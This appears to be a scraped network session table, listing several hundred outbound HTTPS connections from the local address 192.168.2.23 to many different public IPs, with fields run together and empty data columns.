                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23240192.168.2.23386284.0.34.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23241192.168.2.2347464181.204.96.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23242192.168.2.236094834.141.104.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23243192.168.2.2345710108.28.149.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23244192.168.2.2356648157.51.193.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23245192.168.2.2354190138.185.216.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23246192.168.2.233912262.82.180.116443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23247192.168.2.235751027.172.179.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23248192.168.2.2360522133.54.209.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23249192.168.2.233647494.44.196.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23250192.168.2.2352514193.186.63.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23251192.168.2.234204627.184.140.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23252192.168.2.2357832111.188.150.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23253192.168.2.233694441.58.9.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23254192.168.2.2350582178.146.1.99443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23255192.168.2.2360804166.108.147.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23256192.168.2.235750254.65.4.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23257192.168.2.2351114133.84.157.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23258192.168.2.2347530172.35.52.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23259192.168.2.2335356140.44.247.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23260192.168.2.2357530165.72.58.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23261192.168.2.2340454107.146.73.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23262192.168.2.2346872106.2.217.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23263192.168.2.2356322103.51.200.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23264192.168.2.2350450119.175.199.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23265192.168.2.235661285.23.14.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23266192.168.2.2337190134.149.105.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23267192.168.2.2351076131.191.49.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23268192.168.2.2341508121.246.122.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23269192.168.2.235528691.216.244.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23270192.168.2.2335118106.163.70.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23271192.168.2.2357980157.30.99.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23272192.168.2.2350428190.133.172.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23273192.168.2.233546877.148.134.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23274192.168.2.235304038.150.178.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23275192.168.2.235858852.254.161.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23276192.168.2.2337302150.98.173.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23277192.168.2.235270093.32.114.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23278192.168.2.2351870171.26.80.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23279192.168.2.235473623.158.231.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23280192.168.2.2346712172.134.200.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23281192.168.2.234733486.161.214.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23282192.168.2.233350874.244.246.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23283192.168.2.2344776223.102.187.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23284192.168.2.233750862.74.69.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23285192.168.2.2348658159.126.29.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23286192.168.2.2353380106.196.128.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23287192.168.2.2334506188.132.82.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23288192.168.2.2339354184.11.95.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23289192.168.2.2354640129.31.245.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23290192.168.2.233423088.237.181.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23291192.168.2.235554425.29.232.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23292192.168.2.2356050190.180.1.188443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23293192.168.2.2337242102.8.226.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23294192.168.2.2358768112.208.128.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23295192.168.2.235413442.242.43.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23296192.168.2.233762436.6.129.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23297192.168.2.2349466119.244.178.156443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23298192.168.2.2342084212.160.12.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23299192.168.2.2360302134.239.135.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23300192.168.2.2348700174.132.227.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23301192.168.2.235744260.12.142.39443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23302192.168.2.2333052177.155.136.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23303192.168.2.235416245.220.82.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23304192.168.2.235138253.173.155.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23305192.168.2.2348050102.31.225.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23306192.168.2.234771069.74.11.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23307192.168.2.2354890150.165.166.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23308192.168.2.234084023.48.152.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23309192.168.2.2354776195.240.51.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23310192.168.2.23578284.223.143.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23311192.168.2.2333158176.34.62.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23312192.168.2.235410238.192.180.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23313192.168.2.235551449.108.106.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23314192.168.2.2356600120.122.28.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23315192.168.2.2345384101.70.104.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23316192.168.2.2343550164.154.4.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23317192.168.2.234179268.221.206.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23318192.168.2.2357382165.86.248.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23319192.168.2.234343488.96.214.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23320192.168.2.234032813.172.54.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23321192.168.2.2342692166.92.123.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23322192.168.2.236074658.237.11.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23323192.168.2.2360062162.236.52.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23324192.168.2.2360408210.203.155.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23325192.168.2.235605436.209.115.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23326192.168.2.234738634.245.174.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23327192.168.2.2345320203.210.28.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23328192.168.2.234623079.206.52.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23329192.168.2.234705418.96.172.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23330192.168.2.2348966191.160.113.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23331192.168.2.235716651.239.173.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23332192.168.2.235490039.166.60.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23333192.168.2.2358312145.232.114.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23334192.168.2.235315043.23.231.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23335192.168.2.235282835.210.90.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23336192.168.2.2344038100.9.99.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23337192.168.2.233796044.93.87.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23338192.168.2.2334574173.72.121.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23339192.168.2.233307489.63.192.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23340192.168.2.2349742201.85.103.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23341192.168.2.2344636149.189.115.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23342192.168.2.2348918104.232.9.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23343192.168.2.2350908114.177.13.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23344192.168.2.2359182120.91.167.103443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23345192.168.2.2350668156.118.247.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23346192.168.2.2339994110.195.170.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23347192.168.2.2342852121.78.23.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23348192.168.2.2352706204.180.5.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23349192.168.2.2359590202.230.115.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23350192.168.2.2352370195.75.62.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23351192.168.2.233833296.222.204.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23352192.168.2.235081881.226.132.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23353192.168.2.2359472204.221.231.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23354192.168.2.236017832.201.155.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23355192.168.2.2353610171.30.32.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23356192.168.2.235216284.180.115.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23357192.168.2.234669638.215.225.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23358192.168.2.23396329.35.167.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23359192.168.2.2357448111.121.138.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23360192.168.2.233333292.247.182.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23361192.168.2.234405878.54.122.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23362192.168.2.233977867.192.76.137443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23363192.168.2.233790265.143.104.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23364192.168.2.235022668.20.29.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23365192.168.2.2357540113.222.2.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23366192.168.2.235851295.96.119.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23367192.168.2.2360778107.61.86.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23368192.168.2.23485022.16.102.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23369192.168.2.2351422122.161.14.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23370192.168.2.2357440194.119.190.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23371192.168.2.2336752196.152.69.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23372192.168.2.2335312190.52.19.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23373192.168.2.235661286.181.43.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23374192.168.2.2350122202.252.231.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23375192.168.2.234020431.252.2.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23376192.168.2.234618648.158.198.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23377192.168.2.234955241.142.219.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23378192.168.2.233600474.41.138.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23379192.168.2.2339880129.41.182.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23380192.168.2.2343836199.234.28.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23381192.168.2.2336860159.60.81.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23382192.168.2.235817823.243.74.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23383192.168.2.2346702140.113.184.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23384192.168.2.2359118152.69.99.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23385192.168.2.235140446.119.223.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23386192.168.2.235631057.148.6.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23387192.168.2.234327662.58.92.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23388192.168.2.2354122132.36.84.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23389192.168.2.235001624.75.176.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23390192.168.2.2352900192.138.166.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23391192.168.2.2358210114.126.241.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23392192.168.2.233581224.119.213.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23393192.168.2.2335302105.25.129.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23394192.168.2.234686662.43.115.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23395192.168.2.2360070165.61.26.34443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23396192.168.2.2350844223.161.52.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23397192.168.2.2334860177.34.87.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23398192.168.2.2338836126.164.11.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23399192.168.2.233317267.191.61.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23400192.168.2.2341082144.122.168.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23401192.168.2.2341628121.154.168.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23402192.168.2.234970834.120.168.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23403192.168.2.2351036200.58.213.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23404192.168.2.234465214.55.37.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23405192.168.2.234224885.76.251.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23406192.168.2.235651095.245.238.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23407192.168.2.234456486.162.137.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23408192.168.2.2340028129.27.66.143443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23409192.168.2.235670498.216.165.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23410192.168.2.235019025.108.224.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23411192.168.2.2334274200.165.59.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23412192.168.2.2343584138.14.39.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23413192.168.2.2352248166.202.80.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23414192.168.2.2344650192.235.107.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23415192.168.2.2356964101.8.50.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23416192.168.2.2348560102.78.174.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23417192.168.2.233624477.179.255.168443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23418192.168.2.2334450199.86.39.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23419192.168.2.234838240.122.41.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23420192.168.2.2340448205.96.196.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23421192.168.2.2350188188.151.247.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23422192.168.2.2350298110.139.98.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23423192.168.2.233335643.226.48.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23424192.168.2.2342448202.209.143.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23425192.168.2.2341002102.173.42.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23426192.168.2.233508461.138.139.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23427192.168.2.233568648.208.181.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23428192.168.2.2355692221.146.185.59443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23429192.168.2.235720069.92.143.227443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23430192.168.2.2338788223.34.136.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23431192.168.2.2353612132.151.69.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23432192.168.2.235742436.134.105.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23433192.168.2.2347988196.31.106.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23434192.168.2.233879885.120.164.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23435192.168.2.236031898.248.248.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23436192.168.2.2334510112.169.116.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23437192.168.2.235902290.11.110.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23438192.168.2.2357134160.9.240.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23439192.168.2.2336250144.117.199.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23440192.168.2.234452660.235.55.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23441192.168.2.2339156170.231.112.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23442192.168.2.235792081.149.8.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23443192.168.2.234424457.40.97.136443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23444192.168.2.2358176184.6.197.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23445192.168.2.2351640221.8.97.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23446192.168.2.2346602203.59.63.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23447192.168.2.2356540217.38.139.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23448192.168.2.234012078.46.41.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23449192.168.2.2351210123.179.24.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23450192.168.2.2335350148.81.83.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23451192.168.2.23512049.198.38.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23452192.168.2.233416484.37.194.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23453192.168.2.2342502210.25.127.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23454192.168.2.2341944171.11.221.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23455192.168.2.2342834162.19.145.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23456192.168.2.2351472194.127.197.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23457192.168.2.234661843.85.5.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23458192.168.2.2352884152.167.67.241443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23459192.168.2.2354528183.118.139.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                23460192.168.2.2338744118.51.199.122443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
